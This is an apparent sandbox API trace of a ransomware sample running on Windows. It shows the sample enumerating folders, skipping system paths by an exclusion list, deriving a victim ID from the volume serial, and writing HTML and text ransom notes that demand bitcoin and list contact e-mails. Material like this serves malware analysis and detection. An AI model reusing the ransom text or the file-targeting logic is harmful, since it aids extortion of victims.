	[0166.956] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x7d097231, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.956] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.956] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d0710cd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d0710cd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d097231, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.956] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d04ae91, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d04ae91, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d0710cd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.957] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1
	[0166.957] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1
	[0166.957] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1
	[0166.957] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA"
	[0166.957] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\"
	[0166.957] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\", lpString2="MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys"
	[0166.957] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys"
	[0166.957] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\"
	[0166.958] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\"
	[0166.958] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*"
	[0166.958] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.958] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*") returned 55
	[0166.958] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.958] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*") returned 0x37
	[0166.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="windows") returned 0x0
	[0166.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="boot") returned 0x0
	[0166.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="system volume information") returned 0x0
	[0166.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="temp") returned 0x0
	[0166.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="program files") returned 0x0
	[0166.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="appdata") returned 0x0
	[0166.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="application data") returned 0x0
	[0166.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="winnt") returned 0x0
	[0166.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="tmp") returned 0x0
	[0166.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="cache") returned 0x0
	[0166.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="webcache") returned 0x0
	[0166.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="inetcache") returned 0x0
	[0166.963] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.963] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="nvidia") returned 0x0
	[0166.963] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.963] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="packages") returned 0x0
	[0166.963] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.963] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="cookies") returned 0x0
	[0166.963] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.964] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="programdata") returned 0x0
	[0166.964] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.964] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0166.964] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.964] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.965] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys"
	[0166.965] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*"
	[0166.965] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.965] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.965] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.TXT") returned 79
	[0166.965] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.966] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.966] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.969] CloseHandle (hObject=0x390) returned 1
	[0166.971] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.972] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.972] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0166.973] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.973] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.974] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.974] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.974] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0166.974] CloseHandle (hObject=0x390) returned 1
	[0166.975] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.975] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.975] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.975] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.HTML") returned 80
	[0166.975] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.976] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.976] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0166.979] CloseHandle (hObject=0x390) returned 1
	[0166.979] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.980] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.980] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0166.992] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.992] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.992] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.993] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.993] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0166.993] CloseHandle (hObject=0x390) returned 1
	[0166.994] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d0e37c8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.994] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*") returned 55
	[0166.994] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.994] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*") returned 0x37
	[0166.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="windows") returned 0x0
	[0166.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="boot") returned 0x0
	[0166.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="system volume information") returned 0x0
	[0166.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="temp") returned 0x0
	[0166.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="program files") returned 0x0
	[0166.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="appdata") returned 0x0
	[0166.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="application data") returned 0x0
	[0166.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="winnt") returned 0x0
	[0166.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="tmp") returned 0x0
	[0166.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="cache") returned 0x0
	[0166.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="webcache") returned 0x0
	[0166.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="inetcache") returned 0x0
	[0166.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="nvidia") returned 0x0
	[0166.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="packages") returned 0x0
	[0166.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="cookies") returned 0x0
	[0166.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\*.*", lpSrch="programdata") returned 0x0
	[0167.000] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.000] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.001] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d0e37c8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.001] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.001] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d0e37c8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d0e37c8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d109929, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
